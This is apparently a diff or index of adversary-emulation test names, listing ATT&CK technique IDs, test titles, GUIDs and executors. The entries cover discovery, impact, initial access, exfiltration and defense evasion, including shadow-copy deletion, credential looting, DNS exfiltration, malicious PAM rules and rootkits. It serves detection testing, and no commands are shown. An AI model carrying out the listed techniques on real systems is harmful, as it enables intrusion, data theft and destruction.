1460 discovery T1016 System Network Configuration Discovery 4 System Network Configuration Discovery (TrickBot Style) dafaf052-5508-402d-bf77-51e0700c02e2 command_prompt
1461 discovery T1016 System Network Configuration Discovery 5 List Open Egress Ports 4b467538-f102-491d-ace7-ed487b853bf5 powershell
1462 discovery T1016 System Network Configuration Discovery 6 Adfind - Enumerate Active Directory Subnet Objects 9bb45dd7-c466-4f93-83a1-be30e56033ee command_prompt
1463 discovery T1016 System Network Configuration Discovery 7 Qakbot Recon 121de5c6-5818-4868-b8a7-8fd07c455c1b command_prompt
1464 discovery T1016 System Network Configuration Discovery 8 List macOS Firewall Rules ff1d8c25-2aa4-4f18-a425-fede4a41ee88 bash
1465 discovery T1016 System Network Configuration Discovery 9 DNS Server Discovery Using nslookup 34557863-344a-468f-808b-a1bfb89b4fa9 command_prompt
1466 discovery T1482 Domain Trust Discovery 1 Windows - Discover domain trusts with dsquery 4700a710-c821-4e17-a3ec-9e4c81d6845f command_prompt
1467 discovery T1482 Domain Trust Discovery 2 Windows - Discover domain trusts with nltest 2e22641d-0498-48d2-b9ff-c71e496ccdbe command_prompt
1468 discovery T1482 Domain Trust Discovery 3 Powershell enumerate domains and forests c58fbc62-8a62-489e-8f2d-3565d7d96f30 powershell
1469 discovery T1482 Domain Trust Discovery 4 Adfind - Enumerate Active Directory OUs d1c73b96-ab87-4031-bad8-0e1b3b8bf3ec command_prompt
1470 discovery T1482 Domain Trust Discovery 5 Adfind - Enumerate Active Directory Trusts 15fe436d-e771-4ff3-b655-2dca9ba52834 command_prompt
1471 discovery T1482 Domain Trust Discovery 6 Get-DomainTrust with PowerView f974894c-5991-4b19-aaf5-7cc2fe298c5d powershell
1472 discovery T1482 Domain Trust Discovery 7 Get-ForestTrust with PowerView 58ed10e8-0738-4651-8408-3a3e9a526279 powershell
1473 discovery T1482 Domain Trust Discovery 8 TruffleSnout - Listing AD Infrastructure ea1b4f2d-5b82-4006-b64f-f2845608a3bf command_prompt
1474 discovery T1083 File and Directory Discovery 1 File and Directory Discovery (cmd.exe) 0e36303b-6762-4500-b003-127743b80ba6 command_prompt
1475 discovery T1083 File and Directory Discovery 2 File and Directory Discovery (PowerShell) 2158908e-b7ef-4c21-8a83-3ce4dd05a924 powershell
1476 discovery T1083 File and Directory Discovery 3 Nix File and Directory Discovery ffc8b249-372a-4b74-adcd-e4c0430842de sh
1477 discovery T1083 File and Directory Discovery 4 Nix File and Directory Discovery 2 13c5e1ae-605b-46c4-a79f-db28c77ff24e sh
1478 discovery T1083 File and Directory Discovery 5 Simulating MAZE Directory Enumeration c6c34f61-1c3e-40fb-8a58-d017d88286d8 powershell
1479 discovery T1083 File and Directory Discovery 6 Launch DirLister Executable c5bec457-43c9-4a18-9a24-fe151d8971b7 powershell
1480 discovery T1049 System Network Connections Discovery 1 System Network Connections Discovery 0940a971-809a-48f1-9c4d-b1d785e96ee5 command_prompt
1481 discovery T1049 System Network Connections Discovery 2 System Network Connections Discovery with PowerShell f069f0f1-baad-4831-aa2b-eddac4baac4a powershell
1482 discovery T1049 System Network Connections Discovery 3 System Network Connections Discovery Linux & MacOS 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2 sh
1483 discovery T1049 System Network Connections Discovery 4 System Discovery using SharpView 96f974bb-a0da-4d87-a744-ff33e73367e9 powershell
1484 discovery T1619 Cloud Storage Object Discovery 1 AWS S3 Enumeration 3c7094f8-71ec-4917-aeb8-a633d7ec4ef5 sh
1485 discovery T1057 Process Discovery 1 Process Discovery - ps 4ff64f0b-aaf2-4866-b39d-38d9791407cc sh
1486 discovery T1057 Process Discovery 2 Process Discovery - tasklist c5806a4f-62b8-4900-980b-c7ec004e9908 command_prompt
1487 discovery T1057 Process Discovery 3 Process Discovery - Get-Process 3b3809b6-a54b-4f5b-8aff-cb51f2e97b34 powershell
1488 discovery T1057 Process Discovery 4 Process Discovery - get-wmiObject b51239b4-0129-474f-a2b4-70f855b9f2c2 powershell
1489 discovery T1057 Process Discovery 5 Process Discovery - wmic process 640cbf6d-659b-498b-ba53-f6dd1a1cc02c command_prompt
1490 discovery T1057 Process Discovery 6 Discover Specific Process - tasklist 11ba69ee-902e-4a0f-b3b6-418aed7d7ddb command_prompt
1491 discovery T1069.001 Permission Groups Discovery: Local Groups 1 Permission Groups Discovery (Local) 952931a4-af0b-4335-bbbe-73c8c5b327ae sh
1492 discovery T1069.001 Permission Groups Discovery: Local Groups 2 Basic Permission Groups Discovery Windows (Local) 1f454dd6-e134-44df-bebb-67de70fb6cd8 command_prompt
1493 discovery T1069.001 Permission Groups Discovery: Local Groups 3 Permission Groups Discovery PowerShell (Local) a580462d-2c19-4bc7-8b9a-57a41b7d3ba4 powershell
1494 discovery T1069.001 Permission Groups Discovery: Local Groups 4 SharpHound3 - LocalAdmin e03ada14-0980-4107-aff1-7783b2b59bb1 powershell
1495 discovery T1069.001 Permission Groups Discovery: Local Groups 5 Wmic Group Discovery 7413be50-be8e-430f-ad4d-07bf197884b2 powershell
1496 discovery T1069.001 Permission Groups Discovery: Local Groups 6 WMIObject Group Discovery 69119e58-96db-4110-ad27-954e48f3bb13 powershell
1497 discovery T1069.001 Permission Groups Discovery: Local Groups 7 Permission Groups Discovery for Containers- Local Groups 007d7aa4-8c4d-4f55-ba6a-7c965d51219c sh
1498 discovery T1201 Password Policy Discovery 1 Examine password complexity policy - Ubuntu 085fe567-ac84-47c7-ac4c-2688ce28265b bash
1499 discovery T1201 Password Policy Discovery 2 Examine password complexity policy - CentOS/RHEL 7.x 78a12e65-efff-4617-bc01-88f17d71315d bash
1500 discovery T1201 Password Policy Discovery 3 Examine password complexity policy - CentOS/RHEL 6.x 6ce12552-0adb-4f56-89ff-95ce268f6358 bash
1501 discovery T1201 Password Policy Discovery 4 Examine password expiration policy - All Linux 7c86c55c-70fa-4a05-83c9-3aa19b145d1a bash
1502 discovery T1201 Password Policy Discovery 5 Examine local password policy - Windows 4588d243-f24e-4549-b2e3-e627acc089f6 command_prompt
1503 discovery T1201 Password Policy Discovery 6 Examine domain password policy - Windows 46c2c362-2679-4ef5-aec9-0e958e135be4 command_prompt
1504 discovery T1201 Password Policy Discovery 7 Examine password policy - macOS 4b7fa042-9482-45e1-b348-4b756b2a0742 bash
1505 discovery T1201 Password Policy Discovery 8 Get-DomainPolicy with PowerView 3177f4da-3d4b-4592-8bdc-aa23d0b2e843 powershell
1506 discovery T1201 Password Policy Discovery 9 Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy b2698b33-984c-4a1c-93bb-e4ba72a0babb powershell
1507 discovery T1201 Password Policy Discovery 10 Use of SecEdit.exe to export the local security policy (including the password policy) 510cc97f-56ac-4cd3-a198-d3218c23d889 command_prompt
1508 discovery T1201 Password Policy Discovery 11 Examine AWS Password Policy 15330820-d405-450b-bd08-16b5be5be9f4 sh
1509 discovery T1614.001 System Location Discovery: System Language Discovery 1 Discover System Language by Registry Query 631d4cf1-42c9-4209-8fe9-6bd4de9421be command_prompt
1510 discovery T1614.001 System Location Discovery: System Language Discovery 2 Discover System Language with chcp d91473ca-944e-477a-b484-0e80217cd789 command_prompt
1511 discovery T1614.001 System Location Discovery: System Language Discovery 3 Discover System Language with locale 837d609b-845e-4519-90ce-edc3b4b0e138 sh
1512 discovery T1614.001 System Location Discovery: System Language Discovery 4 Discover System Language with localectl 07ce871a-b3c3-44a3-97fa-a20118fdc7c9 sh
1513 discovery T1614.001 System Location Discovery: System Language Discovery 5 Discover System Language by locale file 5d7057c9-2c8a-4026-91dd-13b5584daa69 sh
1514 discovery T1614.001 System Location Discovery: System Language Discovery 6 Discover System Language by Environment Variable Query cb8f7cdc-36c4-4ed0-befc-7ad7d24dfd7a sh
1515 discovery T1012 Query Registry 1 Query Registry 8f7578c4-9863-4d83-875c-a565573bbdf0 command_prompt
1516 discovery T1012 Query Registry 2 Query Registry with Powershell cmdlets 0434d081-bb32-42ce-bcbb-3548e4f2628f powershell
1517 discovery T1012 Query Registry 3 Enumerate COM Objects in Registry with Powershell 0d80d088-a84c-4353-af1a-fc8b439f1564 powershell
1518 discovery T1518.001 Software Discovery: Security Software Discovery 1 Security Software Discovery f92a380f-ced9-491f-b338-95a991418ce2 command_prompt
1519 discovery T1518.001 Software Discovery: Security Software Discovery 2 Security Software Discovery - powershell 7f566051-f033-49fb-89de-b6bacab730f0 powershell
1520 discovery T1518.001 Software Discovery: Security Software Discovery 3 Security Software Discovery - ps (macOS) ba62ce11-e820-485f-9c17-6f3c857cd840 sh
1521 discovery T1518.001 Software Discovery: Security Software Discovery 4 Security Software Discovery - ps (Linux) 23b91cd2-c99c-4002-9e41-317c63e024a2 sh
1522 discovery T1518.001 Software Discovery: Security Software Discovery 5 Security Software Discovery - Sysmon Service fe613cf3-8009-4446-9a0f-bc78a15b66c9 command_prompt
1523 discovery T1518.001 Software Discovery: Security Software Discovery 6 Security Software Discovery - AV Discovery via WMI 1553252f-14ea-4d3b-8a08-d7a4211aa945 command_prompt
1524 discovery T1526 Cloud Service Discovery 1 Azure - Dump Subscription Data with MicroBurst 1e40bb1d-195e-401e-a86b-c192f55e005c powershell
1525 discovery T1018 Remote System Discovery 1 Remote System Discovery - net 85321a9c-897f-4a60-9f20-29788e50bccd command_prompt
1526 discovery T1018 Remote System Discovery 2 Remote System Discovery - net group Domain Computers f1bf6c8f-9016-4edf-aff9-80b65f5d711f command_prompt
1527 discovery T1018 Remote System Discovery 3 Remote System Discovery - nltest 52ab5108-3f6f-42fb-8ba3-73bc054f22c8 command_prompt
1528 discovery T1018 Remote System Discovery 4 Remote System Discovery - ping sweep 6db1f57f-d1d5-4223-8a66-55c9c65a9592 command_prompt
1529 discovery T1018 Remote System Discovery 5 Remote System Discovery - arp 2d5a61f5-0447-4be4-944a-1f8530ed6574 command_prompt
1530 discovery T1018 Remote System Discovery 6 Remote System Discovery - arp nix acb6b1ff-e2ad-4d64-806c-6c35fe73b951 sh
1531 discovery T1018 Remote System Discovery 7 Remote System Discovery - sweep 96db2632-8417-4dbb-b8bb-a8b92ba391de sh
1532 discovery T1018 Remote System Discovery 8 Remote System Discovery - nslookup baa01aaa-5e13-45ec-8a0d-e46c93c9760f powershell
1533 discovery T1018 Remote System Discovery 9 Remote System Discovery - adidnsdump 95e19466-469e-4316-86d2-1dc401b5a959 command_prompt
1534 discovery T1018 Remote System Discovery 10 Adfind - Enumerate Active Directory Computer Objects a889f5be-2d54-4050-bd05-884578748bb4 command_prompt
1535 discovery T1018 Remote System Discovery 11 Adfind - Enumerate Active Directory Domain Controller Objects 5838c31e-a0e2-4b9f-b60a-d79d2cb7995e command_prompt
1536 discovery T1018 Remote System Discovery 12 Remote System Discovery - ip neighbour 158bd4dd-6359-40ab-b13c-285b9ef6fa25 sh
1537 discovery T1018 Remote System Discovery 13 Remote System Discovery - ip route 1a4ebe70-31d0-417b-ade2-ef4cb3e7d0e1 sh
1538 discovery T1018 Remote System Discovery 14 Remote System Discovery - ip tcp_metrics 6c2da894-0b57-43cb-87af-46ea3b501388 sh
1539 discovery T1018 Remote System Discovery 15 Enumerate domain computers within Active Directory using DirectorySearcher 962a6017-1c09-45a6-880b-adc9c57cb22e powershell
1540 discovery T1018 Remote System Discovery 16 Enumerate Active Directory Computers with Get-AdComputer 97e89d9e-e3f5-41b5-a90f-1e0825df0fdf powershell
1541 discovery T1018 Remote System Discovery 17 Enumerate Active Directory Computers with ADSISearcher 64ede6ac-b57a-41c2-a7d1-32c6cd35397d powershell
1542 discovery T1018 Remote System Discovery 18 Get-DomainController with PowerView b9d2e8ca-5520-4737-8076-4f08913da2c4 powershell
1543 discovery T1018 Remote System Discovery 19 Get-WmiObject to Enumerate Domain Controllers e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad powershell
1544 discovery T1018 Remote System Discovery 20 Remote System Discovery - net group Domain Controller 5843529a-5056-4bc1-9c13-a311e2af4ca0 command_prompt
1545 discovery T1046 Network Service Discovery 1 Port Scan 68e907da-2539-48f6-9fc9-257a78c05540 bash
1546 discovery T1046 Network Service Discovery 2 Port Scan Nmap 515942b0-a09f-4163-a7bb-22fefb6f185f sh
1547 discovery T1046 Network Service Discovery 3 Port Scan NMap for Windows d696a3cb-d7a8-4976-8eb5-5af4abf2e3df powershell
1548 discovery T1046 Network Service Discovery 4 Port Scan using python 6ca45b04-9f15-4424-b9d3-84a217285a5c powershell
1549 discovery T1046 Network Service Discovery 5 WinPwn - spoolvulnscan 54574908-f1de-4356-9021-8053dd57439a powershell
1550 discovery T1046 Network Service Discovery 6 WinPwn - MS17-10 97585b04-5be2-40e9-8c31-82157b8af2d6 powershell
1551 discovery T1046 Network Service Discovery 7 WinPwn - bluekeep 1cca5640-32a9-46e6-b8e0-fabbe2384a73 powershell
1552 discovery T1046 Network Service Discovery 8 WinPwn - fruit bb037826-cbe8-4a41-93ea-b94059d6bb98 powershell
1553 discovery T1046 Network Service Discovery 9 Network Service Discovery for Containers 06eaafdb-8982-426e-8a31-d572da633caa sh
1554 discovery T1518 Software Discovery 1 Find and Display Internet Explorer Browser Version 68981660-6670-47ee-a5fa-7e74806420a4 command_prompt
1555 discovery T1518 Software Discovery 2 Applications Installed c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b powershell
1556 discovery T1518 Software Discovery 3 Find and Display Safari Browser Version 103d6533-fd2a-4d08-976a-4a598565280f sh
1557 discovery T1518 Software Discovery 4 WinPwn - Dotnetsearch 7e79a1b6-519e-433c-ad55-3ff293667101 powershell
1558 discovery T1518 Software Discovery 5 WinPwn - DotNet 10ba02d0-ab76-4f80-940d-451633f24c5b powershell
1559 discovery T1518 Software Discovery 6 WinPwn - powerSQL 0bb64470-582a-4155-bde2-d6003a95ed34 powershell
1560 discovery T1124 System Time Discovery 1 System Time Discovery 20aba24b-e61f-4b26-b4ce-4784f763ca20 command_prompt
1561 discovery T1124 System Time Discovery 2 System Time Discovery - PowerShell 1d5711d6-655c-4a47-ae9c-6503c74fa877 powershell
1562 discovery T1124 System Time Discovery 3 System Time Discovery in macOS f449c933-0891-407f-821e-7916a21a1a6f sh
1563 discovery T1124 System Time Discovery 4 System Time Discovery W32tm as a Delay d5d5a6b0-0f92-42d8-985d-47aafa2dd4db command_prompt
1564 discovery T1124 System Time Discovery 5 System Time with Windows time Command 53ead5db-7098-4111-bb3f-563be390e72e command_prompt
1565 reconnaissance T1592.001 Gather Victim Host Information: Hardware 1 Enumerate PlugNPlay Camera d430bf85-b656-40e7-b238-42db01df0183 powershell
1566 impact T1489 Service Stop 1 Windows - Stop service using Service Controller 21dfb440-830d-4c86-a3e5-2a491d5a8d04 command_prompt
1567 impact T1489 Service Stop 2 Windows - Stop service using net.exe 41274289-ec9c-4213-bea4-e43c4aa57954 command_prompt
1568 impact T1489 Service Stop 3 Windows - Stop service by killing process f3191b84-c38b-400b-867e-3a217a27795f command_prompt
1569 impact T1491.001 Defacement: Internal Defacement 1 Replace Desktop Wallpaper 30558d53-9d76-41c4-9267-a7bd5184bed3 powershell
1570 impact T1491.001 Defacement: Internal Defacement 2 Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message ffcbfaab-c9ff-470b-928c-f086b326089b powershell
1571 impact T1531 Account Access Removal 1 Change User Password - Windows 1b99ef28-f83c-4ec5-8a08-1a56263a5bb2 command_prompt
1572 impact T1531 Account Access Removal 2 Delete User - Windows f21a1d7d-a62f-442a-8c3a-2440d43b19e5 command_prompt
1573 impact T1531 Account Access Removal 3 Remove Account From Domain Admin Group 43f71395-6c37-498e-ab17-897d814a0947 powershell
1574 impact T1531 Account Access Removal 4 Change User Password via passwd 3c717bf3-2ecc-4d79-8ac8-0bfbf08fbce6 sh
1575 impact T1531 Account Access Removal 5 Delete User via dscl utility 4d938c43-2fe8-4d70-a5b3-5bf239aa7846 sh
1576 impact T1531 Account Access Removal 6 Delete User via sysadminctl utility d3812c4e-30ee-466a-a0aa-07e355b561d6 sh
1577 impact T1531 Account Access Removal 7 Azure AD - Delete user via Azure AD PowerShell 4f577511-dc1c-4045-bcb8-75d2457f01f4 powershell
1578 impact T1531 Account Access Removal 8 Azure AD - Delete user via Azure CLI c955c1c7-3145-4a22-af2d-63eea0d967f0 powershell
1579 impact T1486 Data Encrypted for Impact 1 Encrypt files using gpg (Linux) 7b8ce084-3922-4618-8d22-95f996173765 bash
1580 impact T1486 Data Encrypted for Impact 2 Encrypt files using 7z (Linux) 53e6735a-4727-44cc-b35b-237682a151ad bash
1581 impact T1486 Data Encrypted for Impact 3 Encrypt files using ccrypt (Linux) 08cbf59f-85da-4369-a5f4-049cffd7709f bash
1582 impact T1486 Data Encrypted for Impact 4 Encrypt files using openssl (Linux) 142752dc-ca71-443b-9359-cf6f497315f1 bash
1583 impact T1486 Data Encrypted for Impact 5 PureLocker Ransom Note 649349c7-9abf-493b-a7a2-b1aa4d141528 command_prompt
1584 impact T1486 Data Encrypted for Impact 6 Encrypt files using 7z utility - macOS 645f0f5a-ef09-48d8-b9bc-f0e24c642d72 sh
1585 impact T1486 Data Encrypted for Impact 7 Encrypt files using openssl utility - macOS 1a01f6b8-b1e8-418e-bbe3-78a6f822759e sh
1586 impact T1486 Data Encrypted for Impact 8 Data Encrypted with GPG4Win 4541e2c2-33c8-44b1-be79-9161440f1718 powershell
1587 impact T1496 Resource Hijacking 1 macOS/Linux - Simulate CPU Load with Yes 904a5a0e-fb02-490d-9f8d-0e256eb37549 bash
1588 impact T1485 Data Destruction 1 Windows - Overwrite file with Sysinternals SDelete 476419b5-aebf-4366-a131-ae3e8dae5fc2 powershell
1589 impact T1485 Data Destruction 2 macOS/Linux - Overwrite file with DD 38deee99-fd65-4031-bec8-bfa4f9f26146 bash
1590 impact T1485 Data Destruction 3 Overwrite deleted data on C drive 321fd25e-0007-417f-adec-33232252be19 command_prompt
1591 impact T1490 Inhibit System Recovery 1 Windows - Delete Volume Shadow Copies 43819286-91a9-4369-90ed-d31fb4da2c01 command_prompt
1592 impact T1490 Inhibit System Recovery 2 Windows - Delete Volume Shadow Copies via WMI 6a3ff8dd-f49c-4272-a658-11c2fe58bd88 command_prompt
1593 impact T1490 Inhibit System Recovery 3 Windows - wbadmin Delete Windows Backup Catalog 263ba6cb-ea2b-41c9-9d4e-b652dadd002c command_prompt
1594 impact T1490 Inhibit System Recovery 4 Windows - Disable Windows Recovery Console Repair cf21060a-80b3-4238-a595-22525de4ab81 command_prompt
1595 impact T1490 Inhibit System Recovery 5 Windows - Delete Volume Shadow Copies via WMI with PowerShell 39a295ca-7059-4a88-86f6-09556c1211e7 powershell
1596 impact T1490 Inhibit System Recovery 6 Windows - Delete Backup Files 6b1dbaf6-cc8a-4ea6-891f-6058569653bf command_prompt
1597 impact T1490 Inhibit System Recovery 7 Windows - wbadmin Delete systemstatebackup 584331dd-75bc-4c02-9e0b-17f5fd81c748 command_prompt
1598 impact T1490 Inhibit System Recovery 8 Windows - Disable the SR scheduled task 1c68c68d-83a4-4981-974e-8993055fa034 command_prompt
1599 impact T1490 Inhibit System Recovery 9 Disable System Restore Through Registry 66e647d1-8741-4e43-b7c1-334760c2047f command_prompt
1600 impact T1529 System Shutdown/Reboot 1 Shutdown System - Windows ad254fa8-45c0-403b-8c77-e00b3d3e7a64 command_prompt
1601 impact T1529 System Shutdown/Reboot 2 Restart System - Windows f4648f0d-bf78-483c-bafc-3ec99cd1c302 command_prompt
1602 impact T1529 System Shutdown/Reboot 3 Restart System via `shutdown` - macOS/Linux 6326dbc4-444b-4c04-88f4-27e94d0327cb bash
1603 impact T1529 System Shutdown/Reboot 4 Shutdown System via `shutdown` - macOS/Linux 4963a81e-a3ad-4f02-adda-812343b351de bash
1604 impact T1529 System Shutdown/Reboot 5 Restart System via `reboot` - macOS/Linux 47d0b042-a918-40ab-8cf9-150ffe919027 bash
1605 impact T1529 System Shutdown/Reboot 6 Shutdown System via `halt` - Linux 918f70ab-e1ef-49ff-bc57-b27021df84dd bash
1606 impact T1529 System Shutdown/Reboot 7 Reboot System via `halt` - Linux 78f92e14-f1e9-4446-b3e9-f1b921f2459e bash
1607 impact T1529 System Shutdown/Reboot 8 Shutdown System via `poweroff` - Linux 73a90cd2-48a2-4ac5-8594-2af35fa909fa bash
1608 impact T1529 System Shutdown/Reboot 9 Reboot System via `poweroff` - Linux 61303105-ff60-427b-999e-efb90b314e41 bash
1609 impact T1529 System Shutdown/Reboot 10 Logoff System - Windows 3d8c25b5-7ff5-4c9d-b21f-85ebd06654a4 command_prompt
1610 initial-access T1133 External Remote Services 1 Running Chrome VPN Extensions via the Registry 2 vpn extension 4c8db261-a58b-42a6-a866-0a294deedde4 powershell
1611 initial-access T1566.001 Phishing: Spearphishing Attachment 1 Download Macro-Enabled Phishing Attachment 114ccff9-ae6d-4547-9ead-4cd69f687306 powershell
1612 initial-access T1566.001 Phishing: Spearphishing Attachment 2 Word spawned a command shell and used an IP address in the command line cbb6799a-425c-4f83-9194-5447a909d67f powershell
1613 initial-access T1091 Replication Through Removable Media 1 USB Malware Spread Simulation d44b7297-622c-4be8-ad88-ec40d7563c75 powershell
1614 initial-access T1195 Supply Chain Compromise 1 Octopus Scanner Malware Open Source Supply Chain 82a9f001-94c5-495e-9ed5-f530dbded5e2 command_prompt
1615 initial-access T1078.001 Valid Accounts: Default Accounts 1 Enable Guest account with RDP capability and admin privileges 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 command_prompt
1616 initial-access T1078.001 Valid Accounts: Default Accounts 2 Activate Guest Account aa6cb8c4-b582-4f8e-b677-37733914abda command_prompt
1617 initial-access T1078.001 Valid Accounts: Default Accounts 3 Enable Guest Account on macOS 0315bdff-4178-47e9-81e4-f31a6d23f7e4 command_prompt
1618 initial-access T1078.004 Valid Accounts: Cloud Accounts 1 Creating GCP Service Account and Service Account Key 9fdd83fd-bd53-46e5-a716-9dec89c8ae8e sh
1619 initial-access T1078.004 Valid Accounts: Cloud Accounts 2 Azure Persistence Automation Runbook Created or Modified 348f4d14-4bd3-4f6b-bd8a-61237f78b3ac powershell
1620 initial-access T1078.003 Valid Accounts: Local Accounts 1 Create local account with admin privileges a524ce99-86de-4db6-b4f9-e08f35a47a15 command_prompt
1621 initial-access T1078.003 Valid Accounts: Local Accounts 2 Create local account with admin privileges - MacOS f1275566-1c26-4b66-83e3-7f9f7f964daa bash
1622 initial-access T1078.003 Valid Accounts: Local Accounts 3 Create local account with admin privileges using sysadminctl utility - MacOS 191db57d-091a-47d5-99f3-97fde53de505 bash
1623 initial-access T1078.003 Valid Accounts: Local Accounts 4 Enable root account using dsenableroot utility - MacOS 20b40ea9-0e17-4155-b8e6-244911a678ac bash
1624 initial-access T1078.003 Valid Accounts: Local Accounts 5 Add a new/existing user to the admin group using dseditgroup utility - macOS 433842ba-e796-4fd5-a14f-95d3a1970875 bash
1625 initial-access T1078.003 Valid Accounts: Local Accounts 6 WinPwn - Loot local Credentials - powerhell kittie 9e9fd066-453d-442f-88c1-ad7911d32912 powershell
1626 initial-access T1078.003 Valid Accounts: Local Accounts 7 WinPwn - Loot local Credentials - Safetykatz e9fdb899-a980-4ba4-934b-486ad22e22f4 powershell
1627 initial-access T1078.003 Valid Accounts: Local Accounts 8 Create local account (Linux) 02a91c34-8a5b-4bed-87af-501103eb5357 bash
1628 initial-access T1078.003 Valid Accounts: Local Accounts 9 Reactivate a locked/expired account (Linux) d2b95631-62d7-45a3-aaef-0972cea97931 bash
1629 initial-access T1078.003 Valid Accounts: Local Accounts 10 Login as nobody (Linux) 3d2cd093-ee05-41bd-a802-59ee5c301b85 bash
1630 exfiltration T1020 Automated Exfiltration 1 IcedID Botnet HTTP PUT 9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0 powershell
1631 exfiltration T1048.002 Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol 1 Exfiltrate data HTTPS using curl windows 1cdf2fb0-51b6-4fd8-96af-77020d5f1bf0 command_prompt
1632 exfiltration T1048.002 Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol 2 Exfiltrate data HTTPS using curl linux 4a4f31e2-46ea-4c26-ad89-f09ad1d5fe01 bash
1633 exfiltration T1041 Exfiltration Over C2 Channel 1 C2 Data Exfiltration d1253f6e-c29b-49dc-b466-2147a6191932 powershell
1634 exfiltration T1048 Exfiltration Over Alternative Protocol 1 Exfiltration Over Alternative Protocol - SSH f6786cc8-beda-4915-a4d6-ac2f193bb988 sh
1635 exfiltration T1048 Exfiltration Over Alternative Protocol 2 Exfiltration Over Alternative Protocol - SSH 7c3cb337-35ae-4d06-bf03-3032ed2ec268 sh
1636 exfiltration T1048 Exfiltration Over Alternative Protocol 3 DNSExfiltration (doh) c943d285-ada3-45ca-b3aa-7cd6500c6a48 powershell
1637 exfiltration T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage 1 Exfiltrate data with rclone to cloud Storage - Mega (Windows) 8529ee44-279a-4a19-80bf-b846a40dda58 powershell
1638 exfiltration T1030 Data Transfer Size Limits 1 Data Transfer Size Limits ab936c51-10f4-46ce-9144-e02137b2016a sh
1639 exfiltration T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 1 Exfiltration Over Alternative Protocol - HTTP 1d1abbd6-a3d3-4b2e-bef5-c59293f46eff manual
1640 exfiltration T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 2 Exfiltration Over Alternative Protocol - ICMP dd4b4421-2e25-4593-90ae-7021947ad12e powershell
1641 exfiltration T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 3 Exfiltration Over Alternative Protocol - DNS c403b5a4-b5fc-49f2-b181-d1c80d27db45 manual
1642 exfiltration T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 4 Exfiltration Over Alternative Protocol - HTTP 6aa58451-1121-4490-a8e9-1dada3f1c68c powershell
1643 exfiltration T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 5 Exfiltration Over Alternative Protocol - SMTP ec3a835e-adca-4c7c-88d2-853b69c11bb9 powershell
1644 exfiltration T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 6 MAZE FTP Upload 57799bc2-ad1e-4130-a793-fb0c385130ba powershell
1645 exfiltration T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 7 Exfiltration Over Alternative Protocol - FTP - Rclone b854eb97-bf9b-45ab-a1b5-b94e4880c56b powershell
1646 exfiltration T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 8 Python3 http.server 3ea1f938-f80a-4305-9aa8-431bc4867313 sh
-331
@@ -1,331 +0,0 @@
Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
defense-evasion,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,1,Malicious PAM rule,4b9dde80-ae22-44b1-a82a-644bf009eb9c,sh
defense-evasion,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,2,Malicious PAM module,65208808-3125-4a2e-8389-a0a00e9ab326,sh
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,1,chmod - Change file or folder mode (numeric mode),34ca1464-de9d-40c6-8c77-690adf36a135,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,2,chmod - Change file or folder mode (symbolic mode),fc9d6695-d022-4a80-91b1-381f5c35aff3,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,3,chmod - Change file or folder mode (numeric mode) recursively,ea79f937-4a4d-4348-ace6-9916aec453a4,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,4,chmod - Change file or folder mode (symbolic mode) recursively,0451125c-b5f6-488f-993b-5a32b09f7d8f,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,5,chown - Change file or folder ownership and group,d169e71b-85f9-44ec-8343-27093ff3dfc0,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,6,chown - Change file or folder ownership and group recursively,b78598be-ff39-448f-a463-adbf2a5b7848,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,7,chown - Change file or folder mode ownership only,967ba79d-f184-4e0e-8d09-6362b3162e99,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,8,chown - Change file or folder ownership recursively,3b015515-b3d8-44e9-b8cd-6fa84faf30b2,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,9,chattr - Remove immutable file attribute,e7469fe2-ad41-4382-8965-99b94dd3c13f,sh
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,10,Chmod through c script,973631cf-6680-4ffa-a053-045e1b6b67ab,sh
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,11,Chown through c script,18592ba1-5f88-4e3c-abc8-ab1c6042e389,sh
defense-evasion,T1014,Rootkit,1,Loadable Kernel Module based Rootkit,dfb50072-e45a-4c75-a17e-a484809c8553,sh
defense-evasion,T1014,Rootkit,2,Loadable Kernel Module based Rootkit,75483ef8-f10f-444a-bf02-62eb0e48db6f,sh
